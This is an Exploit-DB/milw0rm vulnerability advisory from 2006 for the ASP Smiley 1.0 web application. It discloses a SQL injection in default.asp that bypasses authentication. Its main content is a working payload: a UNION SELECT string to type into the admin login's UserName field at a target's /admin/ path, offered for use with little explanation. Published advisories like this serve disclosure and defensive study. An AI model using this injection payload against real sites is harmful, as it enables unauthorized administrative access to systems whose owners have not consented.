ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection

EDB-ID:

2779

Author:

ajann

Type:

webapps

Platform:

ASP

Published:

2006-11-14

*******************************************************************************
# Title  :  ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann

*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0,0,0,0,0,0,0 from categories


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-14]